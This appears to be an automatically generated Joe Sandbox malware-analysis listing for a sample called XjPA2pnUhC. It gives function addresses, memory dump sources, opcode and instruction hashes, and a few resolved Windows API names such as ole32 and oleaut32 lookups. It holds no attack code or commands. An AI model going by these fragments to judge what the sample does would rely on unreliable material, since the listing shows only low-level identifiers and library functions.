                                                          Function 029B56AC Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction ID: a71a8d6b8346aec2ec4fc56737b234a5509b1f1987a79a33359b2333685ac261
                                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction Fuzzy Hash: 52515761B10748D7DF3B966887E5BFE27CE9F42708FDA0919C882CBA81D705E605CB51
                                                          Function 029B547D Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction ID: 6374540a722fdb4ffaf9254c4c25ec7f115ead0cc47a5593fc1876222a521335
                                                          • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction Fuzzy Hash: 615189B160474897DF374A7887687FE23CF9F8230AFCA0809D48ADB691D791E945C752
                                                          Function 029AC246 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                          • Instruction ID: b284b7ec0284c3d7a9ca55b45810c6a96755ae4b6891cb2d94b60c159e450391
                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                          • Instruction Fuzzy Hash: B25159729003488BEB24CF69D99569EBBF8FB48318F24806BD419EB260D774A580CF94
                                                          Function 0299F067 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                          • Instruction ID: bfee155b9f34f221f7dd01d4eda2dd5e92e23768705a51b899f8f204f6845913
                                                          • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                          • Instruction Fuzzy Hash: 3E4107759187458BC350CF29C58021AFBE5FFD8328F649A1EF889E3650D775E9828F82
                                                          Function 029BA8E5 Relevance: 1.3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PkGNG
                                                          • API String ID: 0-263838557
                                                          • Opcode ID: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                          • Instruction ID: 8fc05642c2717fd87c29d8b6f79da9ef6556eba3614a95ee0cb8648201c0d03c
                                                          • Opcode Fuzzy Hash: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                          • Instruction Fuzzy Hash: 6DE0BF31000208FFCF526F54DE48A993B7AEF44652F014464F9095A572CB35DD42DB44
                                                          Function 029C4FD9 Relevance: .6, Instructions: 637COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                          • Instruction ID: 42a8bf880ddf2b80d96b76442f2ddb01a99c9f94f80d0bae9d038692bb6fa7c4
                                                          • Opcode Fuzzy Hash: 7c4eddc6a5d0cdfec55971e2787b996e507c32f56da4d0f735c0f191235488fd
                                                          • Instruction Fuzzy Hash: 3C324821D29F414DD7239A34C922335A24CAFB72C5F66D73BF81AB59A6FB28D1C34106
                                                          Function 0299671B Relevance: .6, Instructions: 598COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                          • Instruction ID: 00ac9ab08656d00fa797d59c7282fef82877aff418a101a4b6ae9f6526e4a4b5
                                                          • Opcode Fuzzy Hash: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                          • Instruction Fuzzy Hash: 6732F1316087459BDF29CF2CC49076AB7EDBF84368F044A2DF8A58B281E775D945CB82
                                                          Function 0298B595 Relevance: .4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                          • Instruction ID: 1ae6cfe16f3d09a4df40d380f7ac76f301420d9b011f1703139918d120d5f113
                                                          • Opcode Fuzzy Hash: 0536839ad9d50ddb588c0ac8460f4bf1c7ee3186167c97336a3805a21c2e7f34
                                                          • Instruction Fuzzy Hash: D5B1D77260430067EA04FB78DCB5DBE369BDFD2714F480A1DF846971D1EE659A08CE92
                                                          Function 029CA93B Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                          • Instruction ID: f6f851d0e5aa630a9dcd22d334642ccccab8a2def44488c550614c32ebd6763d
                                                          • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                          • Instruction Fuzzy Hash: DAB16A316106089FDB19CF28C58AB657BE1FF45369F29865CE8DACF2A1C335E981CB41
                                                          Function 029B5B38 Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                          • Instruction ID: 9f4dd4dd2a5cf3e5f2beed574008ef534bd56b4e966b044b78c04df46fdac9b9
                                                          • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                          • Instruction Fuzzy Hash: 4861BCB1A0071866DA3B5E288B987FE739FEF81709FC6091DE483DB2C0D751A942CB45
                                                          Function 029B58DB Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                          • Instruction ID: 25bf2414dfa992e9debeff9bb420921e57a9fc7e8341a069e0f3ef05103c527b
                                                          • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                          • Instruction Fuzzy Hash: FC61797120070996DA3B9B68CBD4BFE739DDF4A728FC60819E487EB280D711E94AC715
                                                          Function 0299F1D0 Relevance: .2, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                          • Instruction ID: bcf01d64231ec926d619e97b3909e4acd9ac8cc384eb6032f351c0835a184eb7
                                                          • Opcode Fuzzy Hash: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                          • Instruction Fuzzy Hash: E86128729083059FC704DB38D581A5FF7E9AFD8768F440A2EF499D6550EB31EA088A92
                                                          Function 028F20C4 Relevance: .1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                          Function 029AFD80 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: cc9a25ef1146f1021c61d22409eafb7023cc441d2f54f7157b5dd66b2136a0fb
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: CB11347720138243EA168A3ED8B46B6A79DEFC532CB3D426AD0424BF49D323A1519680
                                                          Function 028FD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028FD29D
                                                            • Part of subcall function 028FD268: GetProcAddress.KERNEL32(00000000), ref: 028FD281
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                          • API String ID: 1646373207-1918263038
                                                          • Opcode ID: 4aaf2af2a38e9639646d2faf75366140d609e7912b3020c1ee566987500d69dd
                                                          • Instruction ID: 09d2fb67b80f02511b2f005d7500ddac9201b65c57da6e9b167f29fd7066f89c
                                                          • Opcode Fuzzy Hash: 4aaf2af2a38e9639646d2faf75366140d609e7912b3020c1ee566987500d69dd
                                                          • Instruction Fuzzy Hash: B9410D6DA8C3085AD284ABAD7400477F7DED654B113A0861AF714CB784FEB0FC5D8A6A
                                                          Function 02906ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02906EDE
                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02906EEF
                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02906EFF
                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02906F0F
                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02906F1F
                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02906F2F
                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02906F3F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                          • API String ID: 667068680-2233174745
                                                          • Opcode ID: 38ff2a457021cd9b03dcf28e245e83e835a6f2e60eecb2a20b0210c6b276a061
                                                          • Instruction ID: c00e144a72ce29b525ec0320b89c9c4721c1d84ee4f5fa22bcd98ba7cc7e51fa
                                                          • Opcode Fuzzy Hash: 38ff2a457021cd9b03dcf28e245e83e835a6f2e60eecb2a20b0210c6b276a061
                                                          • Instruction Fuzzy Hash: FBF04CEDA8D354ADBB80BB7A5CC18362BADA9A06047001D35BF52955C3FBB99434CF12
                                                          Function 029C6A3D Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr_wcschr
                                                          • String ID:
                                                          • API String ID: 1963305004-0
                                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                          • Instruction ID: 347ed47a2a044c49c399793b9f852f3bfe83c78574f483c309ab5ae874c41d4f
                                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                          • Instruction Fuzzy Hash: 2ED128B1D043106BDB35AF74DE847AE7BADEFC1324F24816EE945A7280E7369540CB52
                                                          Function 029BD367 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
